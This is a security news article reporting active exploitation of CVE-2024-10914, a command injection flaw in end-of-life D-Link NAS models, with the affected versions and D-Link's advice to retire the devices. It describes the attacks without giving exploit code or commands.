Attackers are now exploiting a critical severity vulnerability with publicly available exploit code affecting several models of end-of-life D-Link network-attached storage (NAS) devices.
The command injection vulnerability, tracked as CVE-2024-10914, was discovered by security researcher Netsecfish, who shared exploitation details and said unauthenticated attackers could leverage this to inject arbitrary shell commands by sending malicious HTTP GET requests to exposed NAS devices online.
It includes the following in the NAS model list: DNS-320 Version 1.00, DNS-320LW Version 1.01.0914.2012, DNS-325 Version 1.01, Version 1.02, and DNS-340L Version 1.08.
The attacks started during the weekend after D-Link announced on Friday that it did not patch the security vulnerability since it only involved end-of-life NAS devices, with the company warning customers to retire affected devices or upgrade to newer ones.
D-Link does not provide software updates, security patches, or technical support for products that have reached their End of Life (EOL) or End of Sale (EOS)”, D-Link said.
However, the vulnerability did not stay unexploited, as the threat actors started targeting it as early as Monday, according to the findings of the Shadowserver threat monitoring service.
Also, Netsecfish announced the discovery of another hard-coded backdoor and an arbitrary command injection vulnerability that affects approximately the same number of D-Link NAS models. Tracked as CVE-2024-3273, both vulnerabilities could be combined to achieve remote code execution on the device in a successful attack. Because of this, users of these end-of-life devices should block all Internet access as soon as possible, as they have been previously used in ransomware attacks.
“In the majority of cases, D-Link is unable to patch device or firmware vulnerabilities in these devices because all development and support on these devices have been discontinued,” the company said on Friday.
“D-Link strongly recommends retiring this product and cautions that continued use may be a risk to devices connected to it. If US owners decide to continue using these devices despite D-Link’s recommendation, please verify the device is using the latest firmware.”
